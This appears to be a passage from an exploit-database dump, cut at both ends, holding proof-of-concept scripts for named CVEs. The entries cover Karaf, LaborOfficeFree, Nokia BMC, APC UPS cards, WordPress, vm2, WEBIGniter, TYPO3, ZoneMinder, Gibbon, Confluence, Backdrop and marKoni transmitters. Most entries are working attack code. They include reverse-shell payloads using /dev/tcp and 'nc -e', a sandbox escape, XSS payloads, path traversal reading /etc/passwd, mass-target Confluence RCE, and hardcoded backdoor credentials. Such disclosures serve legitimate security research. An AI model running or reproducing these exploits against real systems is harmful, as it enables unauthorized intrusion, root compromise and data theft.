bytearray() lhost_byte_array.append(len(lhost)) lhost_byte_array.extend(map(ord, lhost)) activator_class_bytecodes = ACTIVATOR_CLASS_BYTECODE_TEMPLATE.replace( ACTIVATOR_CLASS_LHOST_TAG, lhost_byte_array) lport_str = str(lport) lport_byte_array = bytearray() lport_byte_array.append(len(lport_str)) lport_byte_array.extend(map(ord, lport_str)) activator_class_bytecodes = activator_class_bytecodes.replace( ACTIVATOR_CLASS_LPORT_TAG, lport_byte_array) jar_bytes = io.BytesIO() with zipfile.ZipFile(jar_bytes, "w", zipfile.ZIP_DEFLATED) as zip_file: zip_file.writestr("com/visionspace/osgi/revshell/Activator.class", activator_class_bytecodes) zip_file.writestr("META-INF/MANIFEST.MF", MANIFEST_CONTENT) payload = jar_bytes.getvalue() return payload def deploy_payload(target, basic_auth, jsessionid, payload): """ This function connects to the Karaf Console and deployes the payload. """ success = False url = f"{target}/bundles" cookies = { "JSESSIONID": jsessionid } headers = { "Authorization": basic_auth } files = { "bundlefile": ( "revshell.jar", payload, "application/x-java-archive") } data = { "action": "install", "bundlestart": "start", "bundlestartlevel": 80 } response = requests.post(url, headers=headers, cookies=cookies, files=files, data=data, timeout=10, allow_redirects=False) if response.status_code == 302: success = True return success def generate_basic_auth(creds): """ This function generates the Basic Authorization string based on the credentials. """ creds_base64 = base64.b64encode(creds.encode()).decode() basic_auth = f"Basic {creds_base64}" return basic_auth def create_target_url(rhost, rport): """ This function creates a target URL. """ target_url = f"http://{rhost}:{rport}/system/console" return target_url def main(args): """ Main function. """ target = create_target_url(args.rhost, args.rport) print("[*] Login...") basic_auth = generate_basic_auth(args.creds) jsessionid = authenticate(target, basic_auth) if jsessionid: print("[+] Session established.") print("[*] Generating payload...") payload = generate_payload(args.lhost, args.lport) if payload: print("[*] Deploying payload...") if deploy_payload(target, basic_auth, jsessionid, payload): print("[+] Done.") else: print("[-] Failed to deploy the payload!") else: print("[-] Failed to generate the payload!") else: print("[-] Login failed!") if __name__ == "__main__": main(parse())

# Exploit Title: LaborOfficeFree 19.10 MySQL Root Password Calculator - CVE-2024-1346 # Google Dork: N/A # Date: 09/02/2023 # Exploit Author: Peter Gabaldon - https://pgj11.com/ # Vendor Homepage: https://www.laborofficefree.com/ # Software Link: https://www.laborofficefree.com/#plans # Version: 19.10 # Tested on: Windows 10 # CVE : CVE-2024-1346 # Description: LaborOfficeFree installs a MySQL instance that runs as SYSTEM and calculates the MySQL root password based on two constants. Each time the program needs to connect to MySQL as root, it employs the reverse algorithm to calculate the root password. This issue has been tested on version 19.10 exclusively, but allegedly, versions prior to 19.10 are also vulnerable. """ After installing LaborOfficeFree in testing lab and revesing the backup process, it is possible to determine that it creates a "mysqldump.exe" process with the root user and the password being derived from the string "hola" concated with "00331-20471-98465-AA370" (in this case). This appears to be the license, but it is different from the license shown in the GUI dashboard. This license has to be extracted from memory. From example, attaching a debugger and breaking in the mysqldump process (for that, admin rights are NOT needed). Also, the app checks if you are an admin to perform the backup and fails if the program is not running as adminsitrator. But, this check is not effective, as it is actually calling mysqldump with a derived password. Thus, administrator right are not needed. Here is the disassembly piece of the procedure in LaborOfficeFree.exe responsible of calculating the root password. 00506548 | 53 | push ebx | Aqui se hacen el XOR y demas que calcula la pwd :) 00506549 | 56 | push esi | 0050654A | A3 7CFD8800 | mov dword ptr ds:[88FD7C],eax | eax:"hola00331-20471-98465-AA370" 0050654F | 0FB7C2 | movzx eax,dx | eax:"hola00331-20471-98465-AA370" 00506552 | 85C0 | test eax,eax | eax:"hola00331-20471-98465-AA370" 00506554 | 7E 2E | jle laborofficefree.506584 | 00506556 | BA 01000000 | mov edx,1 | 0050655B | 8B1D 7CFD8800 | mov ebx,dword ptr ds:[88FD7C] | 00506561 | 0FB65C13 FF | movzx ebx,byte ptr ds:[ebx+edx-1] | 00506566 | 8B31 | mov esi,dword ptr ds:[ecx] | 00506568 | 81E6 FF000000 | and esi,FF | 0050656E | 33DE | xor ebx,esi | 00506570 | 8B1C9D A40B8800 | mov ebx,dword ptr ds:[ebx*4+880BA4] | 00506577 | 8B31 | mov esi,dword ptr ds:[ecx] | 00506579 | C1EE 08 | shr esi,8 | 0050657C | 33DE | xor ebx,esi | 0050657E | 8919 | mov dword ptr ds:[ecx],ebx | 00506580 | 42 | inc edx | 00506581 | 48 | dec eax | eax:"hola00331-20471-98465-AA370" 00506582 | 75 D7 | jne laborofficefree.50655B | 00506584 | 5E | pop esi | 00506585 | 5B | pop ebx | 00506586 | C3 | ret | The result number from this procedure is then negated (bitwise NOT) and casted as a signed integer. Note: the address 0x880BA4 stores a constant array of 256 DWORDs entries. 005065C8 | F755 F8 | not dword ptr ss:[ebp-8] | Running this script produces the root password of the LaborOfficeFree MySQL. C:\Users\***\Desktop>python myLaborRootPwdCalculator.py 1591779762 C:\Users\***\Desktop> """ #! /usr/bin/python3 from operator import xor import ctypes if __name__ == "__main__": magic_str = "hola00331-20471-98465-AA370" mask = 0x000000ff const = [0x0,0x77073096,0x0EE0E612C,0x990951BA,0x76DC419,0x706AF48F,0x0E963A535,0x9E6495A3,0x0EDB8832,0x79DCB8A4,0x0E0D5E91E,0x97D2D988,0x9B64C2B,0x7EB17CBD,0x0E7B82D07,0x90BF1D91,0x1DB71064,0x6AB020F2,0x0F3B97148,0x84BE41DE,0x1ADAD47D,0x6DDDE4EB,0x0F4D4B551,0x83D385C7,0x136C9856,0x646BA8C0,0x0FD62F97A,0x8A65C9EC,0x14015C4F,0x63066CD9,0x0FA0F3D63,0x8D080DF5,0x3B6E20C8,0x4C69105E,0x0D56041E4,0x0A2677172,0x3C03E4D1,0x4B04D447,0x0D20D85FD,0x0A50AB56B,0x35B5A8FA,0x42B2986C,0x0DBBBC9D6,0x0ACBCF940,0x32D86CE3,0x45DF5C75,0x0DCD60DCF,0x0ABD13D59,0x26D930AC,0x51DE003A,0x0C8D75180,0x0BFD06116,0x21B4F4B5,0x56B3C423,0x0CFBA9599,0x0B8BDA50F,0x2802B89E,0x5F058808,0x0C60CD9B2,0x0B10BE924,0x2F6F7C87,0x58684C11,0x0C1611DAB,0x0B6662D3D,0x76DC4190,0x1DB7106,0x98D220BC,0x0EFD5102A,0x71B18589,0x6B6B51F,0x9FBFE4A5,0x0E8B8D433,0x7807C9A2,0x0F00F934,0x9609A88E,0x0E10E9818,0x7F6A0DBB,0x86D3D2D,0x91646C97,0x0E6635C01,0x6B6B51F4,0x1C6C6162,0x856530D8,0x0F262004E,0x6C0695ED,0x1B01A57B,0x8208F4C1,0x0F50FC457,0x65B0D9C6,0x12B7E950,0x8BBEB8EA,0x0FCB9887C,0x62DD1DDF,0x15DA2D49,0x8CD37CF3,0x0FBD44C65,0x4DB26158,0x3AB551CE,0x0A3BC0074,0x0D4BB30E2,0x4ADFA541,0x3DD895D7,0x0A4D1C46D,0x0D3D6F4FB,0x4369E96A,0x346ED9FC,0x0AD678846,0x0DA60B8D0,0x44042D73,0x33031DE5,0x0AA0A4C5F,0x0DD0D7CC9,0x5005713C,0x270241AA,0x0BE0B1010,0x0C90C2086,0x5768B525,0x206F85B3,0x0B966D409,0x0CE61E49F,0x5EDEF90E,0x29D9C998,0x0B0D09822,0x0C7D7A8B4,0x59B33D17,0x2EB40D81,0x0B7BD5C3B,0x0C0BA6CAD,0x0EDB88320,0x9ABFB3B6,0x3B6E20C,0x74B1D29A,0x0EAD54739,0x9DD277AF,0x4DB2615,0x73DC1683,0x0E3630B12,0x94643B84,0x0D6D6A3E,0x7A6A5AA8,0x0E40ECF0B,0x9309FF9D,0x0A00AE27,0x7D079EB1,0x0F00F9344,0x8708A3D2,0x1E01F268,0x6906C2FE,0x0F762575D,0x806567CB,0x196C3671,0x6E6B06E7,0x0FED41B76,0x89D32BE0,0x10DA7A5A,0x67DD4ACC,0x0F9B9DF6F,0x8EBEEFF9,0x17B7BE43,0x60B08ED5,0x0D6D6A3E8,0x0A1D1937E,0x38D8C2C4,0x4FDFF252,0x0D1BB67F1,0x0A6BC5767,0x3FB506DD,0x48B2364B,0x0D80D2BDA,0x0AF0A1B4C,0x36034AF6,0x41047A60,0x0DF60EFC3,0x0A867DF55,0x316E8EEF,0x4669BE79,0x0CB61B38C,0x0BC66831A,0x256FD2A0,0x5268E236,0x0CC0C7795,0x0BB0B4703,0x220216B9,0x5505262F,0x0C5BA3BBE,0x0B2BD0B28,0x2BB45A92,0x5CB36A04,0x0C2D7FFA7,0x0B5D0CF31,0x2CD99E8B,0x5BDEAE1D,0x9B64C2B0,0x0EC63F226,0x756AA39C,0x26D930A,0x9C0906A9,0x0EB0E363F,0x72076785,0x5005713,0x95BF4A82,0x0E2B87A14,0x7BB12BAE,0x0CB61B38,0x92D28E9B,0x0E5D5BE0D,0x7CDCEFB7,0x0BDBDF21,0x86D3D2D4,0x0F1D4E242,0x68DDB3F8,0x1FDA836E,0x81BE16CD,0x0F6B9265B,0x6FB077E1,0x18B74777,0x88085AE6,0x0FF0F6A70,0x66063BCA,0x11010B5C,0x8F659EFF,0x0F862AE69,0x616BFFD3,0x166CCF45,0x0A00AE278,0x0D70DD2EE,0x4E048354,0x3903B3C2,0x0A7672661,0x0D06016F7,0x4969474D,0x3E6E77DB,0x0AED16A4A,0x0D9D65ADC,0x40DF0B66,0x37D83BF0,0x0A9BCAE53,0x0DEBB9EC5,0x47B2CF7F,0x30B5FFE9,0x0BDBDF21C,0x0CABAC28A,0x53B39330,0x24B4A3A6,0x0BAD03605,0x0CDD70693,0x54DE5729,0x23D967BF,0x0B3667A2E,0x0C4614AB8,0x5D681B02,0x2A6F2B94,0x0B40BBE37,0x0C30C8EA1,0x5A05DF1B,0x2D02EF8D] result = 0xffffffff for c in magic_str: aux = result & mask aux2 = xor(ord(c), aux) aux3 = xor(const[aux2], (result >> 8)) result = aux3 result = ~result result = ctypes.c_long(result).value print(result)

# Exploit Title: Nokia BMC Log Scanner Remote Code Execution # Google Dork: N/A # Date: November 29, 2023 # Exploit Author: Carlos Andres Gonzalez, Matthew Gregory # Vendor Homepage: https://www.nokia.com/ # Software Link: N/A # Version: 13 # Tested on: Linux # CVE : CVE-2022-45899 Description The BMC Log Scanner web application, available on several hosts, is vulnerable to command injection attacks, allowing for unauthenticated remote code execution. This vulnerability is especially significant because this service runs as root. Steps to Reproduce: In the Search Pattern field, type: ;";command Replacing the word "command" above with any Linux command. Root access can be confirmed with the id command or any other command that would require root access, such as displaying the contents of the /etc/shadow file." This issue was fixed in version 13.1.

# Exploit Title: UPS Network Management Card 4 - Path Traversal # Google Dork: inurl:nmc inurl:logon.htm # Date: 2023-12-19 # Exploit Author: Víctor García # Vendor Homepage: https://www.apc.com/ # Version: 4 # Tested on: Kali Linux # CVE: N/A # PoC: curl -k https://10.10.10.10/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd root:x:0:0:root:/home/root:/bin/sh daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh dhcp:x:997:997::/var/run/dhcp:/bin/false messagebus:x:998:998::/var/lib/dbus:/bin/false mosquitto:x:999:999::/home/mosquitto:/bin/false nobody:x:65534:65534:nobody:/nonexistent:/bin/sh

Exploit Title: WordPress File Upload < 4.23.3 Stored XSS (CVE 2023-4811) Date: 18 December 2023 Exploit Author: Faiyaz Ahmad Vendor Homepage: https://wordpress.com/ Version: 4.23.3 CVE : CVE 2023-4811 Proof Of Concept: 1. Login to the wordpress account 2. Add the following shortcode to a post in "File Upload Plugin": [wordpress_file_upload redirect="true" redirectlink="*javascript:alert(1)*"] 3. Upload any file on the resulting post. 4. After the upload completes, you will see the XSS alert in the browser.

/* # Exploit Title: vm2 Sandbox Escape vulnerability # Date: 23/12/2023 # Exploit Author: Calil Khalil & Adriel Mc Roberts # Vendor Homepage: https://github.com/patriksimek/vm2 # Software Link: https://github.com/patriksimek/vm2 # Version: vm2 <= 3.9.19 # Tested on: Ubuntu 22.04 # CVE : CVE-2023-37466 */ const { VM } = require("vm2"); const vm = new VM(); const command = 'pwd'; // Change to the desired command const code = ` async function fn() { (function stack() { new Error().stack; stack(); })(); } try { const handler = { getPrototypeOf(target) { (function stack() { new Error().stack; stack(); })(); } }; const proxiedErr = new Proxy({}, handler); throw proxiedErr; } catch ({ constructor: c }) { const childProcess = c.constructor('return process')().mainModule.require('child_process'); childProcess.execSync('${command}'); } `; console.log(vm.run(code));

## Title: WEBIGniter v28.7.23 XSS ## Author: RedTeamer IT Security, Mesut Cetin ## Date: 09/04/2023 ## Vendor: https://webigniter.net/ ## Software: https://webigniter.net/demo ## Reference: https://portswigger.net/web-security/cross-site-scripting/stored ## Description: During the user creation process, the 'your_name' parameter fails to adequately validate user input, rendering the system vulnerable to reflected cross-site scripting (XSS) attacks. ## PoC To exploit this vulnerability, an attacker can inject malicious JavaScript code into the "your_name" parameter under https://webigniter.net/create-account during the user creation process. This code, when embedded within an image tag like this: <img src onerror="prompt(8)">, can be executed when the user navigates to the "users" page under their profile. ## Mitigation To mitigate this risk, the "your_name" parameter should be subjected to rigorous input validation and encoding to ensure that all user input is sanitized and rendered harmless.

# Exploit Title: TYPO3 11.5.24 Path Traversal Vulnerability (Authenticated) # Date: Apr 9, 2023 # Exploit Author: Saeed reza Zamanian # Software Link: https://get.typo3.org/release-notes/11.5.24 # Version: 11.5.24 # Tested on: Kali 2022.3 # CVE : CVE-2023-30451 In TYPO3 11.5.24, the filelist component allows attackers (with access to the administrator panel), to read arbitrary files by utilizing a directory traversal via the baseuri field, This is demonstrated through : POST /typo3/record/edit with ../../../ and the parameter data[sys_file_storage]*[data][sDEF][lDEF][basePath][vDEF]. ----------------------------------------------------- To exploit this vulnerability, follow these steps: 1. Log in to the administrator panel. 2. Navigate to 'file' > 'Filelist' section. 3. Right-click on a file storage and select 'New.' 4. Set the base URI to "../../../" and save. After creating the file storage, the final HTTP request should resemble the one below. Once the file storage is created, refresh the page, enabling you to browse any directory on the server. To access "/etc/passwd," browse to the '/etc/' directory, search for 'passwd,' and view the file.

import re import requests from bs4 import BeautifulSoup import argparse import base64 # Exploit Title: Unauthenticated RCE in ZoneMinder Snapshots # Date: 12 December 2023 # Discovered by : @Unblvr1 # Exploit Author: Ravindu Wickramasinghe (@rvizx9) # Vendor Homepage: https://zoneminder.com/ # Software Link: https://github.com/ZoneMinder/zoneminder # Version: prior to 1.36.33 and 1.37.33 # Tested on: Arch Linux, Kali Linux # CVE : CVE-2023-26035 # Github Link : https://github.com/rvizx/CVE-2023-26035 class ZoneMinderExploit: def __init__(self, target_uri): self.target_uri = target_uri self.csrf_magic = None def fetch_csrf_token(self): print("[>] fetching csrt token") response = requests.get(self.target_uri) self.csrf_magic = self.get_csrf_magic(response) if response.status_code == 200 and re.match(r'^key:[a-f0-9]{40},\d+', self.csrf_magic): print(f"[>] recieved the token: {self.csrf_magic}") return True print("[!] unable to fetch or parse token.") return False def get_csrf_magic(self, response): return BeautifulSoup(response.text, 'html.parser').find('input', {'name': '__csrf_magic'}).get('value', None) def execute_command(self, cmd): print("[>] sending payload..") data = {'view': 'snapshot', 'action': 'create', 'monitor_ids[0][Id]': f';{cmd}', '__csrf_magic': self.csrf_magic} response = requests.post(f"{self.target_uri}/index.php", data=data) print("[>] payload sent" if response.status_code == 200 else "[!] failed to send payload") def exploit(self, payload): if self.fetch_csrf_token(): print(f"[>] executing...") self.execute_command(payload) if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument('-t', '--target-url', required=True, help='target url endpoint') parser.add_argument('-ip', '--local-ip', required=True, help='local ip') parser.add_argument('-p', '--port', required=True, help='port') args = parser.parse_args() # generating the payload ps1 = f"bash -i >& /dev/tcp/{args.local_ip}/{args.port} 0>&1" ps2 = base64.b64encode(ps1.encode()).decode() payload = f"echo {ps2} | base64 -d | /bin/bash" ZoneMinderExploit(args.target_url).exploit(payload)

# Exploit Title: Gibbon LMS has a PHP Deserialization vulnerability on the v26.0.00 version # Date: 22.01.2024 # Exploit Author: SecondX.io Research Team(Ali Maharramli,Fikrat Guliev,Islam Rzayev ) # Vendor Homepage: https://gibbonedu.org/ # Software Link: https://github.com/GibbonEdu/core # Version: v26.0.00 # Tested on: Ubuntu 22.0 # CVE : CVE-2024-24725 import requests import re import sys import base64 import urllib.parse def login(target_host, target_port,email,password): url = f'http://{target_host}:{target_port}/login.php?timeout=true' headers = {"Content-Type": "multipart/form-data; boundary=---------------------------174475955731268836341556039466"} data = f"-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"address\"\r\n\r\n\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"method\"\r\n\r\ndefault\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n{email}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n{password}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"gibbonSchoolYearID\"\r\n\r\n025\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"gibboni18nID\"\r\n\r\n0002\r\n-----------------------------174475955731268836341556039466--\r\n" r = requests.post(url, headers=headers, data=data, allow_redirects=False) print(url) print(r.headers) Session_Cookie = re.split(r"\s+", r.headers['Set-Cookie']) if Session_Cookie[4] is not None and '/index.php' in str(r.headers['Location']): print("[X] Login successful!") return Session_Cookie[4] def generate_payload(command): # Given base64-encoded string ### Actual Payload: ### a:2:{i:7%3BO:32:"Monolog\Handler\SyslogUdpHandler":1:{s:9:"%00*%00socket"%3BO:29:"Monolog\Handler\BufferHandler":7:{s:10:"%00*%00handler"%3Br:3%3Bs:13:"%00*%00bufferSize"%3Bi:-1%3Bs:9:"%00*%00buffer"%3Ba:1:{i:0%3Ba:2:{i:0%3Bs:COMMAND_SIZE:"COMMAND"%3Bs:5:"level"%3BN%3B}}s:8:"%00*%00level"%3BN%3Bs:14:"%00*%00initialized"%3Bb:1%3Bs:14:"%00*%00bufferLimit"%3Bi:-1%3Bs:13:"%00*%00processors"%3Ba:2:{i:0%3Bs:7:"current"%3Bi:1%3Bs:6:"system"%3B}}}i:7%3Bi:7%3B} base64_encoded_string = 'YToyOntpOjclM0JPOjMyOiJNb25vbG9nXEhhbmRsZXJcU3lzbG9nVWRwSGFuZGxlciI6MTp7czo5OiIlMDAqJTAwc29ja2V0IiUzQk86Mjk6Ik1vbm9sb2dcSGFuZGxlclxCdWZmZXJIYW5kbGVyIjo3OntzOjEwOiIlMDAqJTAwaGFuZGxlciIlM0JyOjMlM0JzOjEzOiIlMDAqJTAwYnVmZmVyU2l6ZSIlM0JpOi0xJTNCczo5OiIlMDAqJTAwYnVmZmVyIiUzQmE6MTp7aTowJTNCYToyOntpOjAlM0JzOkNPTU1BTkRfU0laRToiQ09NTUFORCIlM0JzOjU6ImxldmVsIiUzQk4lM0J9fXM6ODoiJTAwKiUwMGxldmVsIiUzQk4lM0JzOjE0OiIlMDAqJTAwaW5pdGlhbGl6ZWQiJTNCYjoxJTNCczoxNDoiJTAwKiUwMGJ1ZmZlckxpbWl0IiUzQmk6LTElM0JzOjEzOiIlMDAqJTAwcHJvY2Vzc29ycyIlM0JhOjI6e2k6MCUzQnM6NzoiY3VycmVudCIlM0JpOjElM0JzOjY6InN5c3RlbSIlM0J9fX1pOjclM0JpOjclM0J9' command_size = len(command) # Decode base64 decoded_bytes = base64.b64decode(base64_encoded_string) decoded_string = decoded_bytes.decode('utf-8') # URL decode payload = urllib.parse.unquote(decoded_string) # Replace placeholders in the decoded string payload = payload.replace('COMMAND_SIZE', str(command_size)) payload = payload.replace('COMMAND', command) print("[X] Payload Generated!") return payload def rce(cookie, target_host, target_port, command): url = f'http://{target_host}:{target_port}/index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4' headers = {"Content-Type": "multipart/form-data; boundary=---------------------------104550429928543086952438317710","Cookie": cookie} payload = generate_payload(command) data = f'-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="address"\r\n\r\n/modules/System Admin/import_run.php\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="mode"\r\n\r\nsync\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="syncField"\r\n\r\nN\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="syncColumn"\r\n\r\n\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="columnOrder"\r\n\r\n{payload}\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition:form-data; name="columnText"\r\n\r\nN;\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="fieldDelimiter"\r\n\r\n%2C\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="stringEnclosure"\r\n\r\n%22\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="filename"\r\n\r\nDataStructure-externalAssessment.xlsx\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="csvData"\r\n\r\n"External Assessment","Assessment Date","Student","Field Name Category","Field Name","Result"\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="ignoreErrors"\r\n\r\n1\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="Failed"\r\n\r\nSubmit\r\n-----------------------------104550429928543086952438317710--' r = requests.post(url, headers=headers, data=data, allow_redirects=False) print("[X] Request sent!") start_index = r.text.find("<h2>Step 4 - Live Run</h2>") end_index = r.text.find("<div class", start_index) result = r.text[start_index+26:end_index].strip() if result != '': print("[X] Execution result: \n"+result) else: print("[X] Command failed or did not output anything.") with open("pocresponse.html", "wb") as f: f.write(r.content) if __name__ == '__main__': if len(sys.argv) != 6: print("[X] Usage: script.py <target_host> <target_port/url> <email> <password> <command>") print("[X] Example: python gibbon_rce.py 192.168.1.100 80/gibbon [email protected] password1 \"./nc -e /bin/bash 172.28.218.3 4444\"") sys.exit(1) cookie = login(sys.argv[1], sys.argv[2],sys.argv[3],sys.argv[4]) rce(cookie, sys.argv[1], sys.argv[2], sys.argv[5])

# Exploit Title: CVE-2023-22527: Atlassian Confluence RCE Vulnerability # Date: 25/1/2024 # Exploit Author: MaanVader # Vendor Homepage: https://www.atlassian.com/software/confluence # Software Link: https://www.atlassian.com/software/confluence # Version: 8.0.x, 8.1.x, 8.2.x, 8.3.x, 8.4.x, 8.5.0-8.5.3 # Tested on: 8.5.3 # CVE : CVE-2023-22527 import requests import argparse import urllib3 from prompt_toolkit import PromptSession from prompt_toolkit.formatted_text import HTML from rich.console import Console # Disable SSL warnings urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # Argument parsing parser = argparse.ArgumentParser(description="Send a payload to Confluence servers.") parser.add_argument("-u", "--url", help="Single Confluence Server URL") parser.add_argument("-f", "--file", help="File containing list of IP addresses") parser.add_argument("-c", "--command", help="Command to Execute") parser.add_argument("--shell", action="store_true", help="Open an interactive shell on the specified URL") args = parser.parse_args() # Rich console for formatted output console = Console() # Function to send payload def send_payload(url, command): headers = { 'Connection': 'close', 'Content-Type': 'application/x-www-form-urlencoded' } payload = ('label=\\u0027%2b#request\\u005b\\u0027.KEY_velocity.struts2.context\\u0027\\u005d.internalGet(\\u0027ognl\\u0027).findValue(#parameters.x,{})%2b\\u0027' '&[email protected]@getResponse().getWriter().write((new freemarker.template.utility.Execute()).exec({"' + command + '"}))\r\n') headers['Content-Length'] = str(len(payload)) full_url = f"{url}/template/aui/text-inline.vm" response = requests.post(full_url, verify=False, headers=headers, data=payload, timeout=10, allow_redirects=False) return response.text.split('<!DOCTYPE html>')[0].strip() # Interactive shell function def interactive_shell(url): session = PromptSession() console.print("[bold yellow][!] Shell is ready, please type your commands UwU[/bold yellow]") while True: try: cmd = session.prompt(HTML("<ansired><b>$ </b></ansired>")) if cmd.lower() in ["exit", "quit"]: break response = send_payload(url, cmd) console.print(response) except KeyboardInterrupt: break except Exception as e: console.print(f"[bold red]Error: {e}[/bold red]") break # Process file function def process_file(file_path): with open(file_path, 'r') as file: for line in file: ip = line.strip() url = f"http://{ip}:8090" console.print(f"Processing {url}") print(send_payload(url, args.command)) # Main execution logic if args.shell and args.url: interactive_shell(args.url) elif args.url and args.command: print(send_payload(args.url, args.command)) elif args.file and args.command: process_file(args.file) else: print("Error: Please provide a valid URL and a command or use the interactive shell option.")

# Exploit Title: Backdrop CMS 1.23.0 - Stored Cross-Site Scripting - Post Body Field # Date: 2023-08-21 # Exploit Author: Sinem Şahin # Vendor Homepage: https://backdropcms.org/ # Version: 1.23.0 # Tested on: Windows & XAMPP ==> Tutorial <== 1- Go to the following url. => http://(HOST)/backdrop/node/add/post 2- Write your xss payload in the body of the post. Formatting options should be RAW HTML to choose from. 3- Press "Save" button. XSS Payload ==> "<script>alert("post_body")</script>

#!/usr/bin/env python # # # TELSAT marKoni FM Transmitter 1.9.5 Root Command Injection PoC Exploit # # # Vendor: TELSAT Srl # Product web page: https://www.markoni.it # Affected version: Markoni-D (Compact) FM Transmitters # Markoni-DH (Exciter+Amplifiers) FM Transmitters # Markoni-A (Analogue Modulator) FM Transmitters # Firmware: 1.9.5 # 1.9.3 # 1.5.9 # 1.4.6 # 1.3.9 # # Summary: Professional FM transmitters. # # Desc: The marKoni FM transmitters are susceptible to unauthenticated # remote code execution with root privileges. An attacker can exploit # a command injection vulnerability by manipulating the Email settings' # WAN IP info service, which utilizes the 'wget' module. This allows # the attacker to gain unauthorized access to the system with administrative # privileges by exploiting the 'url' parameter in the HTTP GET request # to ekafcgi.fcgi. # # ------------------------------------------------------------------------- # [lqwrm@metalgear ~]# python yp.tiolpxe 10.0.8.3:88 backdoor 10.0.8.69 whoami # Authentication successful for backdoor # Injecting command: whoami # Listening on port 9999 # ('10.0.8.3', 47302) called back # Received: root # Housekeeping... # Zya and thanks for stopping by! # # [lqwrm@metalgear ~]# # # ------------------------------------------------------------------------- # # Tested on: GNU/Linux 3.10.53 (armv7l) # icorem6solox # lighttpd/1.4.33 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # Macedonian Information Security Research and Development Laboratory # Zero Science Lab - https://www.zeroscience.mk - @zeroscience # # # Advisory ID: ZSL-2024-5808 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5808.php # # # 10.11.2023 # from colorama import init, Fore import re,os,sys,requests import socket,threading from time import sleep init() def just_listen_to_me(lport, cstop): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(("0.0.0.0", lport)) s.listen(1) print("Listening on port " + str(lport)) try: conn, addr = s.accept() print(addr, "called back") cstop.set() except socket.timeout: print("Call return timeout\nCheck your ports") conn.close() while True: try: odg = conn.recv(1771).decode() uam = re.search(r"User-Agent:\s*(.*)", odg) if uam: uav = uam.group(1) print(f"Received: {uav}") exit() else: print("No output for you") except: print("Housekeeping...") exit() s.close() def authenticate(ipaddr, option): #### Encrypted Shit ####_" auth_url = f"http://{ipaddr}" # oOoOoOoOoOoOoOoOoOoOoOo" ep = "/cgi-bin/ekafcgi.fcgi?OpCode=" ##################" if option == "user": ##################################" username = "\x75\x73\x65\x72" #####################" password = "\x75\x73\x65\x72" #####################" elif option == "admin": ###############################" username = "\x61\x64\x6D\x69\x6E" #################" password = "\x61\x64\x6D\x69\x6E" #################" elif option == "backdoor": ############################" username = "\x66\x61\x63\x74\x6F\x72\x79" #########" password = "\x69\x6E\x6F\x6B\x72\x61\x6D\x32\x35"#_" authp = { 'username': username, 'password': password } resp = requests.get(auth_url + ep + "1", params=authp) if "Set-Cookie" in resp.headers: print(f"Authentication successful for {option}") auth_cookie = resp.headers["Set-Cookie"].split(";")[0] return auth_cookie else: print(f"Authentication failed for {option}.") print("Try a different option.") return None def execute(ipaddr, cookie, command, listen_ip): print(f"Injecting command: {command}") ep = "/cgi-bin/ekafcgi.fcgi?OpCode=" eden = f"http://{ipaddr}{ep}26&param=wget&ena=1&url=-U%20%60{command}%60%20{listen_ip}:9999" dva = f"http://{ipaddr}{ep}27" tri = f"http://{ipaddr}{ep}26&param=wget&ena=0&url=" clear = f"http://{ipaddr}{ep}3&com1=203C%20001001" headers = {"Cookie": cookie} requests.get(eden, headers=headers) sleep(2) requests.get(dva, headers=headers) sleep(2) requests.get(tri, headers=headers) sleep(1) requests.get(clear, headers=headers) print("Zya and thanks for stopping by!") exit(0) def njaaah(text): columns = os.get_terminal_size().columns print(text.center(columns)) zsl = "\033[91mWaddup!\033[0m" #Win64 mrjox = f""" ________ / \\ / ____ \\ | / 0 \\ | | \\______/ | \\____________/ {zsl} | | / \\ / O \\ | O \\ | \\ | \\ |_________| """ if len(sys.argv) != 5: print() print("This is a PoC script for the marKoni transmitters 0day") print("Usage: python yp.tiolpxe <target_ip:port> <option> <listen_ip> <command>") print("Option: 'user', 'admin', 'backdoor'") print("Default listening port: 9999") njaaah(mrjox) exit() ipaddr = sys.argv[1] opt = sys.argv[2] listen_ip = sys.argv[3] command = 